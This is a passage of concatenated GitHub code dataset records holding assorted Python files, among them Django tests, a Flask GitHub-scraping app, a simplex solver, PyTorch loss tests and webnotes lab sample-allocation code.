struct.unpack(\">q\",data[0])[0]\nprint(time.localtime(t))","repo_name":"Egorrko/Net","sub_path":"2_task/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12385420935","text":"from turtle import Turtle\r\nFONT = (\"Arial, 40, normal\")\r\nALIGNMENT = \"center\"\r\n\r\nclass Banner(Turtle):\r\n def __init__(self, score):\r\n super.__init__()\r\n self.score = score\r\n \r\n def game_over(self):\r\n if self.score == 50:\r\n self.write(arg=\"You know your states!\", font=FONT, align=ALIGNMENT)\r\n else:\r\n self.write(arg=f\"You got {self.score} of the states!\", font=FONT, 
align=ALIGNMENT)","repo_name":"adewong-dotcom/Python","sub_path":"US_States_Game/banner.py","file_name":"banner.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1780480686","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase\nfrom django.urls import reverse\n\nfrom task_manager.forms import (\n PositionSearchForm,\n TaskSearchForm,\n TaskTypeSearchForm,\n WorkerCreationForm,\n WorkerSearchForm,\n WorkerUpdateForm\n)\n\nfrom task_manager.models import Position, Task, TaskType\n\n\nclass WorkerTests(TestCase):\n def setUp(self) -> None:\n self.position = Position.objects.create(\n name=\"Developer\"\n )\n\n self.form_data = {\n \"username\": \"test_user\",\n \"password1\": \"Pass123test\",\n \"password2\": \"Pass123test\",\n \"first_name\": \"Test\",\n \"last_name\": \"User\",\n \"phone_number\": \"+380955084759\",\n \"position\": self.position,\n }\n self.form = WorkerCreationForm(data=self.form_data)\n\n def test_worker_creation_is_valid(self):\n self.assertTrue(self.form.is_valid())\n self.assertEqual(self.form.cleaned_data, self.form_data)\n\n def test_phone_number_equal_13(self):\n phone_numbers = [\"+3809550847511\", \"+3809550847\"]\n\n for phone_number in phone_numbers:\n form_data = {\"phone_number\": phone_number}\n form = WorkerUpdateForm(data=form_data)\n\n self.assertFalse(form.is_valid())\n self.assertEqual(\n form.errors[\"phone_number\"][0],\n \"Phone number should consist of 13 characters\"\n )\n\n def test_phone_number_first_character(self):\n form_data = {\"phone_number\": \"1380955084751\"}\n\n form = WorkerUpdateForm(data=form_data)\n\n self.assertFalse(form.is_valid())\n self.assertEqual(\n form.errors[\"phone_number\"][0],\n \"Phone number should start with a character '+'\"\n )\n\n def test_phone_number_last_5_characters_digits(self):\n form_data = {\"phone_number\": \"+A80955084751\"}\n\n form = WorkerUpdateForm(data=form_data)\n\n self.assertFalse(form.is_valid())\n self.assertEqual(\n form.errors[\"phone_number\"][0],\n \"Last 12 characters should be digits\"\n )\n\n\nclass TaskTests(TestCase):\n def setUp(self) -> None:\n self.position = Position.objects.create(\n name=\"Developer\"\n )\n self.task_type = TaskType.objects.create(\n name=\"Bug\"\n )\n self.user = get_user_model().objects.create_user(\n username=\"john_smith\",\n phone_number=\"+380955084755\",\n first_name=\"John\",\n last_name=\"Smith\",\n password=\"Johns12345\",\n position=self.position\n )\n\n self.client.force_login(self.user)\n\n def test_create_task(self):\n response = self.client.post(\n reverse(\"task_manager:task-create\"),\n {\n \"name\": \"Test Task\",\n \"description\": \"Test description\",\n \"deadline\": \"2023-08-25\",\n \"is_completed\": False,\n \"priority\": \"Medium\",\n \"task_type\": self.task_type.id,\n \"assignees\": [self.user.id],\n },\n )\n self.assertEqual(response.status_code, 302)\n self.assertEqual(\n Task.objects.get(id=self.user.tasks.first().id).name, \"Test Task\"\n )\n\n def test_update_task(self):\n task = Task.objects.create(\n name=\"Test Task\",\n description=\"Test description\",\n deadline=\"2023-08-25\",\n is_completed=False,\n priority=\"Medium\",\n task_type=self.task_type,\n )\n response = self.client.post(\n reverse(\"task_manager:task-update\", kwargs={\"pk\": task.id}),\n {\n \"pk\": task.id,\n \"description\": \"Test description\",\n \"deadline\": \"2023-08-25\",\n \"is_completed\": False,\n \"priority\": 
\"Medium\",\n \"name\": \"Not Test Task\",\n \"task_type\": self.task_type.id,\n \"assignees\": [self.user.id],\n },\n )\n Task.objects.get(id=task.id).refresh_from_db()\n self.assertEqual(response.status_code, 302)\n self.assertEqual(Task.objects.get(id=task.id).name, \"Not Test Task\")\n\n def test_delete_task(self):\n task = Task.objects.create(\n name=\"Test Task\",\n description=\"Test description\",\n deadline=\"2023-08-25\",\n is_completed=False,\n priority=\"Medium\",\n task_type=self.task_type,\n )\n response = self.client.post(\n reverse(\"task_manager:task-delete\", kwargs={\"pk\": task.id})\n )\n self.assertEqual(response.status_code, 302)\n self.assertFalse(Task.objects.filter(id=task.id).exists())\n\n\nclass SearchFormTests(TestCase):\n def setUp(self) -> None:\n self.position = Position.objects.create(\n name=\"Designer\"\n )\n self.task_type = TaskType.objects.create(\n name=\"New feature\"\n )\n self.user = get_user_model().objects.create_user(\n username=\"john_smith\",\n phone_number=\"+380955084755\",\n first_name=\"John\",\n last_name=\"Smith\",\n password=\"Johns12345\",\n position=self.position\n )\n\n self.client.force_login(self.user)\n\n def test_task_search_form(self):\n Task.objects.create(\n name=\"Test Task\",\n description=\"Test description\",\n deadline=\"2023-08-25\",\n is_completed=False,\n priority=\"Medium\",\n task_type=self.task_type,\n )\n form_data = {\"name\": \"Test\"}\n form = TaskSearchForm(data=form_data)\n\n self.assertTrue(form.is_valid())\n\n expected_result = Task.objects.filter(name=\"Test Task\")\n\n response = self.client.get(\n reverse(\"task_manager:task-list\") + \"?name=\" + form_data[\"name\"]\n )\n self.assertEqual(\n list(response.context[\"task_list\"]), list(expected_result)\n )\n\n def test_position_search_form(self):\n form_data = {\"name\": \"Designer\"}\n form = PositionSearchForm(data=form_data)\n\n self.assertTrue(form.is_valid())\n\n expected_result = Position.objects.filter(name=\"Designer\")\n\n response = self.client.get(\n reverse(\n \"task_manager:position-list\") + \"?name=\" + form_data[\"name\"]\n )\n self.assertEqual(\n list(response.context[\"position_list\"]), list(expected_result)\n )\n\n def test_task_type_search_form(self):\n form_data = {\"name\": \"New\"}\n form = TaskTypeSearchForm(data=form_data)\n\n self.assertTrue(form.is_valid())\n\n expected_result = TaskType.objects.filter(name=\"New feature\")\n\n response = self.client.get(\n reverse(\n \"task_manager:task-type-list\"\n ) + \"?name=\" + form_data[\"name\"]\n )\n self.assertEqual(\n list(response.context[\"task_type_list\"]), list(expected_result)\n )\n\n def test_worker_search_form(self):\n form_data = {\"username\": \"john\"}\n form = WorkerSearchForm(data=form_data)\n\n self.assertTrue(form.is_valid())\n\n expected_result = get_user_model().objects.filter(\n username=\"john_smith\"\n )\n\n response = self.client.get(\n reverse(\n \"task_manager:worker-list\"\n ) + \"?username=\" + form_data[\"username\"]\n )\n self.assertEqual(\n list(response.context[\"worker_list\"]), list(expected_result)\n )\n","repo_name":"PodorogaNatalia/it-company-task-manager","sub_path":"task_manager/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":7627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40800315960","text":"# guard_example.py\r\nimport time\r\nfrom collections import namedtuple\r\n\r\nfrom miros import spy_on\r\nfrom miros import Event\r\nfrom miros import 
signals\r\nfrom miros import ActiveObject\r\nfrom miros import return_status\r\n\r\nOptionalPayload = namedtuple('OptionalPayload', ['x'])\r\n\r\ndef guard():\r\n return True\r\n\r\ndef action():\r\n print('some action')\r\n\r\n@spy_on\r\ndef source_state(chart, e):\r\n status = return_status.UNHANDLED\r\n if(e.signal == signals.SIGNAL_NAME):\r\n if guard():\r\n action()\r\n chart.post_fifo(Event(signal=signals.EVT_A))\r\n status = chart.trans(target_state)\r\n else:\r\n chart.temp.fun = chart.top\r\n status = return_status.SUPER\r\n return status\r\n \r\n@spy_on\r\ndef target_state(chart, e):\r\n chart.temp.fun = chart.top\r\n status = return_status.SUPER\r\n return status\r\n\r\nif __name__ == \"__main__\":\r\n # event arrow example\r\n ao = ActiveObject('eae')\r\n ao.live_trace = True\r\n ao.start_at(source_state)\r\n ao.post_fifo(Event(signal=signals.SIGNAL_NAME,\r\n payload=OptionalPayload(x='1')))\r\n time.sleep(0.01)\r\n\r\n","repo_name":"aleph2c/miros","sub_path":"examples/guard_example.py","file_name":"guard_example.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"76"} +{"seq_id":"70786104566","text":"import os\nimport pytest\nimport torch\nfrom src.dataset.utils import nifi_volume\nfrom src.losses import new_losses, utils\nfrom torch import nn\n\n\n@pytest.fixture(scope=\"function\")\ndef gt_mask():\n patient = \"BraTS20_Training_001_p0_64x64x64\"\n gen_path = \"/Users/lauramora/Documents/MASTER/TFM/Data/2020/train/random_tumor_distribution/\"\n volume_path = os.path.join(gen_path, patient, f\"{patient}_seg.nii.gz\")\n return nifi_volume.load_nifi_volume(volume_path, normalize=False)\n\n@pytest.fixture(scope=\"function\")\ndef volume_flair():\n patient = \"BraTS20_Training_001_p0_64x64x64\"\n gen_path = \"/Users/lauramora/Documents/MASTER/TFM/Data/2020/train/random_tumor_distribution/\"\n volume_path = os.path.join(gen_path, patient, f\"{patient}_flair.nii.gz\")\n return nifi_volume.load_nifi_volume(volume_path, normalize=True)\n\n\nclass Identity(nn.Module):\n\n def forward(self, input):\n return input\n\ndef test_dice_loss(gt_mask):\n\n gt_mask[gt_mask == 4] = 3\n\n my_loss = new_losses.GeneralizedDiceLoss()\n\n seg_mask = torch.from_numpy(gt_mask.astype(int))\n\n target = seg_mask.unsqueeze(0).to(\"cpu\")\n target = utils.expand_as_one_hot(target, num_classes=4)\n\n my_loss.normalization = Identity()\n\n loss, score = my_loss(target, target)\n\n assert round(loss.item()) == 0\n assert round(score.item()) == 1\n\n\ndef test_dice_los_real_results(gt_mask, volume_flair):\n from src.models.vnet import vnet\n\n gt_mask[gt_mask == 4] = 3\n\n network = vnet.VNet(elu=True, in_channels=1, classes=4, init_features_maps=16)\n network.to(\"cpu\")\n\n my_loss = new_losses.GeneralizedDiceLoss()\n\n network.train()\n volume_flair = torch.from_numpy(volume_flair).unsqueeze(0).unsqueeze(0)\n outputs, scores = network(volume_flair.float())\n\n seg_mask = torch.from_numpy(gt_mask.astype(int))\n\n target = seg_mask.unsqueeze(0).to(\"cpu\")\n target = utils.expand_as_one_hot(target, num_classes=4)\n\n\n loss, score = my_loss(outputs, target)\n\n assert round(loss.item()) == 1\n assert round(score.item()) == 0","repo_name":"imatge-upc/mri-braintumor-segmentation","sub_path":"tests/losses/test_new_loss.py","file_name":"test_new_loss.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"76"} 
+{"seq_id":"42971205136","text":"\"\"\" Main \"\"\"\n\nfrom urllib import urlopen\nfrom flask import Flask, render_template, request, Blueprint\nfrom bs4 import BeautifulSoup\nimport chartkick\n\napp = Flask(__name__)\nck = Blueprint('ck_page', __name__, static_folder=chartkick.js(), static_url_path='/static')\napp.register_blueprint(ck, url_prefix='/ck')\napp.jinja_env.add_extension(\"chartkick.ext.charts\")\n\n\ndef fetch(username):\n \"\"\"\n Function to fetch the user's language from Github.\n \"\"\"\n lang_dict = {}\n url = \"https://github.com/\" + username + \"?tab=repositories\"\n resp = urlopen(url)\n\n if resp.getcode() == 404:\n return \"Username doesn't exist\"\n elif resp.getcode() == 200:\n soup = BeautifulSoup(resp, \"lxml\")\n\n for repo_details in soup.find_all(class_='repo-list-stats'):\n repo_lang = str(repo_details.contents[0].strip())\n\n if repo_lang == \"\":\n repo_lang = \"Other\"\n\n if repo_lang in lang_dict:\n lang_dict[repo_lang] += 1\n else:\n lang_dict[repo_lang] = 1\n\n # return lang_dict\n return render_template(\"chart.html\", user=username, data=lang_dict)\n else:\n return \"There was an error. HTTP response code: \" + str(resp.getcode())\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n \"\"\"\n This function serves the GET and POST request for the index.html\n \"\"\"\n if request.method == \"POST\":\n return fetch(request.form[\"username\"])\n return render_template(\"index.html\")\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"arafsheikh/my-github-lang-chart","sub_path":"flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25449042863","text":"import pandas as pd\nfrom MLP import MLP\nfrom auxiliar import train_test_split\n\ni = 25 #nº de neurônios de entrada\nj = 10 #nº de neurônios da camada oculta\nk = 3 #nº de neurônios de saída\n\n#base de dados\nsheet_url = \"https://docs.google.com/spreadsheets/d/10Bd1gwY9GK6dJg-web9TLN0PSJ_m4p820BngimA-ud0/edit#gid=0\"\nurl = sheet_url.replace('/edit#gid=', '/export?format=csv&gid=')\nbase = pd.read_csv(url) #os números estão representados por conjuntos de 25 bits\n\nmlp = MLP(base, i, j, k)\n\nx_train, y_train, x_test, y_test = train_test_split(base)\nmlp.fit(x_train, y_train)\npred = mlp.predict(x_test)\nprint('y_test')\nprint(y_test)\nprint('predict')\nprint(pred)\n\n\n\n","repo_name":"pslayne/neural-network","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70698311927","text":"from app.data_models.answer_store import AnswerStore\nfrom app.data_models.relationship_store import RelationshipStore\nfrom app.questionnaire.relationship_location import RelationshipLocation\nfrom app.questionnaire.relationship_router import RelationshipRouter\n\n\ndef relationship_router(answers=None, relationships=None):\n return RelationshipRouter(\n answer_store=AnswerStore(answers),\n relationship_store=RelationshipStore(relationships),\n section_id=\"relationships-section\",\n list_name=\"people\",\n list_item_ids=[\"abc123\", \"def123\", \"ghi123\", \"jkl123\"],\n relationships_block_id=\"relationships\",\n )\n\n\ndef relationship_location(list_item_id, to_list_item_id):\n return RelationshipLocation(\n section_id=\"relationships-section\",\n list_name=\"people\",\n list_item_id=list_item_id,\n 
to_list_item_id=to_list_item_id,\n block_id=\"relationships\",\n )\n\n\ndef test_can_access_location():\n location = relationship_location(\"abc123\", \"def123\")\n can_access_location = relationship_router().can_access_location(location)\n assert can_access_location\n\n\ndef test_cant_access_location():\n location = relationship_location(\"def123\", \"abc123\")\n can_access_location = relationship_router().can_access_location(location)\n assert not can_access_location\n\n\ndef test_get_first_location():\n first_location = relationship_router().get_first_location()\n expected_location = relationship_location(\"abc123\", \"def123\")\n assert first_location == expected_location\n\n\ndef test_get_last_location():\n last_location = relationship_router().get_last_location()\n expected_location = relationship_location(\"ghi123\", \"jkl123\")\n assert last_location == expected_location\n\n\ndef test_get_next_location():\n location = relationship_location(\"abc123\", \"def123\")\n next_location = relationship_router().get_next_location(location)\n expected_location = relationship_location(\"abc123\", \"ghi123\")\n assert next_location == expected_location\n\n\ndef test_get_next_location_goes_to_next_person():\n location = relationship_location(\"abc123\", \"jkl123\")\n next_location = relationship_router().get_next_location(location)\n expected_location = relationship_location(\"def123\", \"ghi123\")\n assert next_location == expected_location\n\n\ndef test_get_previous_location():\n location = relationship_location(\"abc123\", \"ghi123\")\n previous_location = relationship_router().get_previous_location(location)\n expected_location = relationship_location(\"abc123\", \"def123\")\n assert previous_location == expected_location\n\n\ndef test_get_previous_location_goes_to_previous_person():\n location = relationship_location(\"def123\", \"ghi123\")\n previous_location = relationship_router().get_previous_location(location)\n expected_location = relationship_location(\"abc123\", \"jkl123\")\n assert previous_location == expected_location\n","repo_name":"ONSdigital/eq-questionnaire-runner","sub_path":"tests/app/questionnaire/test_relationship_router.py","file_name":"test_relationship_router.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"76"} +{"seq_id":"3940983839","text":"\ndef printMatrix(A):\n\tfor i in A:\n\t\tfor j in i:\n\t\t\tprint(j,end=' ')\n\t\tprint(\"\")\n\ndef dot(v1,v2):\n\treturn sum([v1[i]*v2[i] for i in range(len(v1))])\n\ndef introduce_slack(f,A,b):\n\tnumber_of_slack=len(A)\n\tfinalMatrix=[[-i for i in f]+[0]*(number_of_slack+1)]\n\t\n\tfor i in range(number_of_slack):\n\t\tfinalMatrix.append(A[i]+[0]*i+[1]+[0]*(number_of_slack-i-1)+[b[i]])\n\t\n\treturn(finalMatrix)\n\ndef done(A):\n\tfor i in range(len(A[0])-1):\n\t\tif A[0][i]<0:\n\t\t\treturn False\n\treturn True\n\ndef find_pivot(A):\n\tmini=0\n\tminind=-1\n\tfor i in range(len(A[0])):\n\t\tif A[0][i]<0 and A[0][i]0 or A[i][-1]<0) and A[i][pivot_col]/A[i][-1]>mini:\n\t\t\tmini=A[i][pivot_col]/A[i][-1]\n\t\t\tminind=i\n\tpivot_row=minind\n\treturn((pivot_row,pivot_col))\n\ndef row_add(A,r1,r2,scalar): #r2 += scalar * r1\n\tfor i in range(len(A[0])):\n\t\tA[r2][i]+=scalar*A[r1][i]\n\ndef clear_column(A,pivot):\n\trow=pivot[0]\n\tcol=pivot[1]\n\tfor i in range(len(A)):\n\t\tif i!=row and (A[i][col]>0 or A[i][col]<0):\n\t\t\tscalar=-A[i][col]/A[row][col]\n\t\t\trow_add(A,row,i,scalar)\n\t\telif i==row:\n\t\t\ta=A[row][col]\n\t\t\tfor j in 
range(len(A[row])):\n\t\t\t\tA[row][j]/=a\n\ndef pivot(A,B,pivot):\n\tprint(\"PIVOT\",pivot,B)\n\tB[pivot[0]-1]=pivot[1]\n\tclear_column(A,pivot)\n\ndef conclude(A,B,f):\n\tresult=[0 for i in f]\n\t\n\tfor i in range(len(B)):\n\t\tif B[i] indentation and prevIndentation > 2:\n # w('}' * (prevIndentation - indentation))\n # prevIndentation = indentation\n # if bodyMode:\n # w('.' + lf)\n unindent(prevIndentation, indentation)\n prevIndentation = indentation\n w('%' + ln)\n bodyMode = False\n continue\n\n if '\"' in ln or \"'\" in ln:\n raise ValueError('String literals are not supported yet.')\n\n # Strip away the first tab.\n ln = ln[1:]\n readBody = isBody(ln)\n\n # We recognized a body, now strip away the next tab.\n if readBody:\n ln = ln[1:]\n\n if not readBody:\n ln = ln.lstrip()\n\n # Preprocessor rules (constants).\n if ln[0] == '#':\n w(ln)\n continue\n\n # Since we are in head mode we can strip away (no need to read any further indentation).\n ln = ln.lstrip()\n\n # We were in body mode, so terminate the previous body.\n # if bodyMode:\n # w('.')\n unindent(prevIndentation, 1)\n prevIndentation = 1\n bodyMode = False\n\n # Check for a hard constraint.\n if len(ln) == 2 and ln[0] == cons[1]:\n w(cons + lf)\n continue\n\n # Check for a weak constraint.\n if len(ln) == 2 and ln[0] == wcons[1]:\n w(wcons + lf)\n continue\n\n # TODO: This breaks for string literals (there may be a pipe in a string literal).\n ln = ln.split('|')\n\n # Special case: Facts over fixed integer ranges.\n # TODO: This breaks for string literals (there might be two dots inside a string literal).\n if len(ln) == 1 and '..' in ln[0]:\n w(atomize(ln[0].strip()) + '.' + lf)\n # Since this fact auto-terminates, we fake prevIndentation.\n prevIndentation = 0\n continue\n\n w(tab + ' v '.join(map(lambda x: atomize(x.strip()), ln)) + ' ' + cons + ' ')\n continue\n\n # We are treating bodies from here on.\n if not bodyMode:\n w(lf)\n\n indentation = 2\n while ln[0] == tab:\n indentation += 1\n ln = ln[1:]\n\n # Strip away trailing newline and other stuff...\n ln = ln.strip()\n\n isAggregate = False\n for aggregate in aggregates:\n if ln.startswith(aggregate):\n isAggregate = True\n\n # We first handle the easier case of non-aggregates.\n if not isAggregate:\n unindent(prevIndentation, indentation)\n\n if bodyMode and prevIndentation >= indentation:\n w(',')\n\n w(tab * indentation + atomize(ln))\n prevIndentation = indentation\n bodyMode = True\n continue\n\n ln = keepSpaces(ln)\n if bodyMode:\n w(lf + ',')\n\n w(tab * indentation + ln[1] + ' = ' + ln[0] + '{' + (','.join(ln[2:]) if len(ln) > 3 else ln[2]) + ': ' + lf)\n bodyMode = True\n\n if bodyMode:\n w('.')\n","repo_name":"lorenzleutgeb/asp-lite","sub_path":"asp_lite/transpile.py","file_name":"transpile.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6166821651","text":"from __future__ import unicode_literals\nfrom webnotes.model.doc import addchild\nfrom webnotes.model.doc import Document\nfrom webnotes.model.bean import getlist\nfrom webnotes.model.doc import getchildren\nfrom webnotes.utils import cint, cstr, flt, now, nowdate\n\nimport webnotes\n\nclass DocType:\n\tdef __init__(self, d, dl):\n\t\tself.doc, self.doclist = d, dl\n\n\tdef on_submit(self):\n\t\tself.update_sample_status()\n\n\n\t#Update sample status to the Lab Entry after completing the sample allocation to lab stage.\n\tdef update_sample_status(self):\n\t\tfor sample in 
getlist(self.doclist, 'final_sample_allocation'):\n\t\t\twebnotes.conn.sql(\"update tabSample set status = 'Lab Entry' where name ='\"+sample.sample_no+\"'\")\n\t\t\twebnotes.conn.sql(\"commit\")\n\t\t\t\n\n\n\t#Select sample details from sample table with respect to the priority & quantity specified.\n\tdef get_sample_details(self,priority):\n\t\t#n=0\n\t\tif priority=='Critical':\n\t\t\tsample_details=webnotes.conn.sql(\"select name, barcode from `tabSample` where priority='\"+priority+\"' and status='Ready To Lab Entry' \",as_list=1)\n\n\t\telif priority=='Normal':\n\t\t\tsample_details=webnotes.conn.sql(\"select name, barcode from `tabSample` where priority='\"+priority+\"' and status='Ready To Lab Entry'\",as_list=1)\n\t\telse:\n\t\t\tsample_details=webnotes.conn.sql(\"select name, barcode from `tabSample` where priority='\"+priority+\"' and status='Ready To Lab Entry'\",as_list=1)\n\t\tif self.doc.flag1==0 and self.doc.priority=='Critical':\n\t\t\t\twebnotes.msgprint(\"Sorry--!!! You have Already choose priority='\"+priority+\"' please choose any other priority\",raise_exception=1)\n\t\telif self.doc.flag2==1 and self.doc.priority=='Normal':\n\t\t\t\twebnotes.msgprint(\"Sorry--!!! You have Already choose priority='\"+priority+\"' please choose any other priority\",raise_exception=1)\n\t\telif self.doc.flag3==2 and self.doc.priority=='Urgent':\n\t\t\t\twebnotes.msgprint(\"Sorry--!!! You have Already choose priority='\"+priority+\"' please choose any other priority\",raise_exception=1)\t\t\t\n\t\telse:\n\n\t\t\tfor i in sample_details:\n\t\t\t\t\ttest=webnotes.conn.sql(\"select group_concat(b.test_name),a.group_name from `tabTest Allocation` a,`tabRegister Test Name` b where a.name=b.parent and sample_no='\"+i[0]+\"'\")\n\t\t\t\t\t#webnotes.errprint(test[0][1])\n\t\t\t\t\tif test:\n\t\t\t\t\t\tch = addchild(self.doc, 'prioritywise_sample_allocation', \n\t\t\t\t\t\t'Priority Wise Sample Allocation', self.doclist)\n\t\t\t\t\t\tch.priority = priority\n\t\t\t\t\t\tch.sample_no=i[0]\n\t\t\t\t\t\tch.bottle_no=i[1]\n\t\t\t\t\t\tch.test=test[0][0]\n\t\t\t\t\t\tch.test_group=test[0][1]\n\t\t\t\t\t\tch.save(new=1)\n\t\t\t\t\telse:\n\t\t\t\t\t\twebnotes.msgprint(\"There is no any record against current sample No in Test Allocation\")\n\t\t\tif priority=='Critical':\n\n\t\t\t\treturn{\n\t\t\t\t\t\t'flag1':0\n\t\t\t\t}\n\t\t\t\t\n\t\t\telif priority=='Normal':\n\t\t\t\treturn{\n\t\t\t\t\t\t'flag2':1\n\t\t\t\t}\n\t\t\telse:\n\t\t\t\treturn{\n\t\t\t\t\t\t'flag3':2\n\t\t\t\t}\n\n\n\t#Add sample number details according to the specified quantity and priority\n\tdef get_prioritywise_details(self):\n\n\t\tlist1=[]\n\t\tlist2=[]\n\t\tlist3=[]\n\t\tif self.doc.critical_samples and self.doc.normal_samples and self.doc.urgent_samples:\n\n\t\t\tfor p in getlist(self.doclist, 'prioritywise_sample_allocation'):\n\t\t\t\t#webnotes.errprint(x.priority)\n\t\t\t\tif p.priority=='Critical':\n\t\t\t\t\tlist1.append(p.priority)\n\t\t\t\t\t\n\t\t\t\telif p.priority=='Normal':\n\t\t\t\t\tlist2.append(p.priority)\n\t\t\t\telse:\n\t\t\t\t\tlist3.append(p.priority)\n\t\t\tif cstr(len(list1))<= self.doc.critical_samples:\n\n\t\t\t\tif cstr(len(list2))<= self.doc.normal_samples:\n\n\t\t\t\t\tif cstr(len(list3))<= self.doc.urgent_samples:\n\t\t\t\t\t\tpass\n\t\t\t\t\telse:\n\t\t\t\t\t\twebnotes.msgprint(\"Number Of smples having priority 'Urgent' is not equal to or less than the specified quantity of samples for this priority\",raise_exception=1)\n\n\t\t\t\telse:\n\t\t\t\t\twebnotes.msgprint(\"Number Of smples having priority 
Normal is not equal to the specified quantity of samples for this priority\",raise_exception=1)\n\n\n\t\t\telse:\n\t\t\t\twebnotes.msgprint(\"Number Of smples having priority Critical is not equal to the specified quantity of samples for this priority\",raise_exception=1)\n\n\n\t\t\tself.doclist=self.doc.clear_table(self.doclist,'final_sample_allocation')\n\n\t\t\tfor d in getlist(self.doclist, 'prioritywise_sample_allocation'):\n\t\t\t\t#webnotes.errprint(d)\n\t\t\t\tcd =addchild(self.doc,'final_sample_allocation','Final Sample Allocation To Lab',self.doclist)\n\t\t\t\tcd.priority=d.priority\n\t\t\t\tcd.sample_no=d.sample_no\n\t\t\t\tcd.bottle_no=d.bottle_no\n\t\t\t\tcd.test_group=d.test_group\n\t\t\t\tcd.test=d.test\n\t\t\t\tcd.save(new=1)\n\t\t\t\n\n\n#To map sample allocation to lab page to the Sample allocation to Tester page \n@webnotes.whitelist()\ndef sample_allocation_to_tester(source_name, target_doclist=None):\n\t\n\treturn _sample_allocation_to_tester(source_name, target_doclist)\n\n\n\ndef _sample_allocation_to_tester(source_name, target_doclist=None, ignore_permissions=False):\n\n\tfrom webnotes.model.mapper import get_mapped_doclist\n\t# webnotes.errprint(source_name)\n\tdef postprocess(source, doclist):\n\t\t#webnotes.errprint(source_name)\n \t\tdoclist[0].sample_allocation_lab= source_name\n\tdoclist = get_mapped_doclist(\"Sample Allocation To Lab\", source_name, {\n\t\t\t\"Sample Allocation To Lab\": {\n\t\t\t\t\"doctype\": \"Sample Allocation\", \n\t\t\t\t\t\t\t\t\n\t\t\t\t\"validation\": {\n\t\t\t\t\t\"docstatus\": [\"=\", 1]\n\t\t\t\t}\n\t\t\t}\n\t},target_doclist ,postprocess)\n\n\treturn [d.fields for d in doclist]\n\n\n\n#Get count of samples according to the priority\n@webnotes.whitelist()\ndef get_count():\n\t#webnotes.errprint(\"in get count\")\n\tcount_dict = {'Normal': 0,'Urgent': 0,'Critical': 0}\n\n\tcounts=webnotes.conn.sql(\"select priority,count(priority) from `tabSample` where status='Ready To Lab Entry' group by priority\",as_list=1)\n\t# webnotes.errprint(counts)\n\t# webnotes.errprint(len(counts))\n\n\tfor i in counts:\n\t\t\tcount_dict[i[0]] = i[1]\n\n\t#webnotes.errprint(count_dict)\n\n\t\n\treturn [[k, v] for k, v in count_dict.iteritems()]\n\n","repo_name":"saurabh6790/tru_app_back","sub_path":"test/doctype/sample_allocation_to_lab/sample_allocation_to_lab.py","file_name":"sample_allocation_to_lab.py","file_ext":"py","file_size_in_byte":5747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32852600744","text":"import sys\ninput = sys.stdin.readline\n\na = int(input())\nold_lst = list(map(int, input().split()))\nold_lst.sort()\nb = int(input())\nnew_lst = list(map(int, input().split()))\n\nfor i in new_lst: # 이진탐색\n first, last, res = 0, len(old_lst)-1, 0\n while first <= last:\n mid = int((first + last)/2)\n if i > old_lst[mid]:\n first = mid + 1\n elif i < old_lst[mid]:\n last = mid - 1\n else:\n res = 1\n break\n print(res)\n","repo_name":"DohyunJegal/Baekjoon","sub_path":"class2/1920.py","file_name":"1920.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12710695877","text":"# [문제]\n# 이싸피는영화정보를제공해주는서비스의개발팀에서데이터분석을담당하고있다. \n# The Movie Database API를이용하여데이터를수집하였다.\n# 받아온영화샘플정보는dictionary 형태이다. \n# 영화데이터는다음과같이구성되어있다고할때아래의신규기능을추가하려고한다.\n\n# 평점이8점이상이라면True를반환하고, 8점미만이라면False를반환하는함수is_good_rate를완성하시오. \n# (반환되는값True와False는bool 자료형이다.)\n\n# [문제풀이]\n# 1. 
if문을 딕셔너리의 value를 이용해서 True와 False를 구분\n\n\n\n# 함수 내부에 불필요한 print문이 있는 경우 오답으로 처리가 됩니다.\ndef is_good_rate(movie):\n if movie['user_rating'] >= 8: # user_rating의 값이 8이상이면 True\n return True\n else:\n return False\n\n\n\n# 아래의 코드를 수정하거나 새롭게 추가하지 않습니다.\n########## 코드 변경 금지 ############\nif __name__ == '__main__':\n movie = {\n \"id\": 1,\n \"user_rating\": 8.1,\n \"title\": \"그리고 내일\",\n \"overview\": \"과거보다 더 성장한 당신은 드디어 꿈을 이루게 된다.\",\n }\n\n print(is_good_rate(movie)) # True","repo_name":"KimBeomGi/STUDYduringSSAFY","sub_path":"월말평가/1월 월말평가/월말평가_01_Python_10problems/구미2반_김범기/problem03.py","file_name":"problem03.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2992600129","text":"import os\nfrom pandas import DataFrame\nfrom app.api.products.inventory_plot.schema import InventoryPlotParams\nfrom app.utils.paths import TMP_DIR\nfrom rinstat import cdms_products\n\n\ndef inventory_plot_create(data: DataFrame, params: InventoryPlotParams) -> str:\n\n output_path: str = TMP_DIR\n output_file_name: str 